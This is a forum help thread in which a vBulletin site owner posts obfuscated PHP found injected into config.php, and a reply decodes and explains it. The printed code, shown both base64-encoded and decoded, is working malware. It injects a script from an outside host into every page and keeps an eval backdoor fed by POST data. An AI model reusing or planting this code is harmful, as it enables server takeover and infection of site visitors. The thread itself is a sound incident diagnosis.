Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 2 of 2
  1. #1
    Regular Coder
    Join Date
    Jul 2008
    Posts
    150
    Thanks
    24
    Thanked 0 Times in 0 Posts

    problem in my vBulletin forum files, please help!

    Hello, i have a forum, i installed on it vBulletin 3.8.4 nulled by DGT...
    it was working very great, but after couple of days the forum shut downed with this error in the home page
    Code:
    Fatal error: Cannot redeclare kch() (previously declared in /home/gongring/public_html/index.php(1) : eval()'d code:1) in /home/gong/public_html/includes/config.php(1) : eval()'d code on line 1
    and error like it in the admin control panel too, beside when i checked the config.php file, i found it got edited with some how and this code has been added in it !!

    Code:
    <?php eval(base64_decode('aWYoIWlzc2V0KCRrY2gxKSl7ZnVuY3Rpb24ga2NoKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMlJ5TFcxb1lYTm9hVzB1WTI5dEwwTnZiblJoWTNSVmN5OXRlV0ZzWW5WdExuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBrY2gyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGtjaDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGtjaDEpKWNhbGxfdXNlcl9mdW5jKCRrY2gxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2tjaCcpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdrY2gnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0ka2NobD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigna2NoMicpKSE9J2tjaDInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
    so i wonder is this new function that cause the error has been added by a hacker? or just this vBulletin version hasn't been nulled very well and the function has been generated by the forum files itself or maybe the files has been edited with some how by the vbulletin team to disable the forum ??
    please any ideas about the reason of this error and the reason of editing the files ???
    Thanks
    Last edited by crazy.works; 10-31-2009 at 04:03 PM.
    Okay...

  • #2
    God Emperor Fou-Lu's Avatar
    Join Date
    Sep 2002
    Location
    Saskatoon, Saskatchewan
    Posts
    16,979
    Thanks
    4
    Thanked 2,659 Times in 2,628 Posts
    That code was likely injected:
    PHP Code:
    if(!isset($kch1))
    {
        function 
    kch($s)
        {
            if(
    preg_match_all('#<script(.*?)</script>#is',$s,$a))
            foreach(
    $a[0] as $v)
            if(
    count(explode("\n",$v))>5)
            {
                
    $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||
                
    preg_match('#[\(\[](\s*\d+,){20,}#',$v);
                if((
    preg_match('#\beval\b#',$v)&&
                        (
    $e||strpos($v,'fromCharCode')))||
                        (
    $e&&strpos($v,'document.write')))
                
    $s=str_replace($v,'',$s);
            }
            if(
    preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
            foreach(
    $a[0] as $v)
            if(
    preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&
                    !
    strstr($v,'?'.'>'))
            
    $s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
            
    $s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RyLW1oYXNoaW0uY29tL0NvbnRhY3RVcy9teWFsYnVtLnBocCA+PC9zY3JpcHQ+'),'',$s);
            
    // The above decodes to: <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>
            
    if(stristr($s,'<body'))
            
    $s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
            elseif(
    strpos($s,',a'))
            
    $s.=$a;
            return 
    $s;
        }
        function 
    kch2($a,$b,$c,$d)
        {
            global 
    $kch1;
            
    $s=array();
            if(
    function_exists($kch1))
            
    call_user_func($kch1,$a,$b,$c,$d);
            foreach(@
    ob_get_status(1) as $v)
            if((
    $a=$v['name'])=='kch')
            return;
            elseif(
    $a=='ob_gzhandler')
            break;
            else
            
    $s[]=array($a=='default output handler'?false:$a);
            for(
    $i=count($s)-1;$i>=0;$i--)
            {
                
    $s[$i][1]=ob_get_contents();
                
    ob_end_clean();
            }
            
    ob_start('kch');
            for(
    $i=0;$i<count($s);$i++)
            {
                
    ob_start($s[$i][0]);
                echo 
    $s[$i][1];
            }
        }
    }

    $kchl=(($a=@set_error_handler('kch2'))!='kch2')?$a:0;
    eval(
    base64_decode($_POST['e'])); 
    There is no reason for a built system to insert dynamic functions into itself.

    You'll need to scan you're access logs to see where the vulnerability exists. Look closely at anything that was through a POST or PUT method to see where the data came from (it will likely appear as the base64 encoded chunk) and what script and action it took to get it in there.
    PHP Code:
    header('HTTP/1.1 420 Enhance Your Calm'); 

  • Users who have thanked Fou-Lu for this post:

    crazy.works (10-31-2009)


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •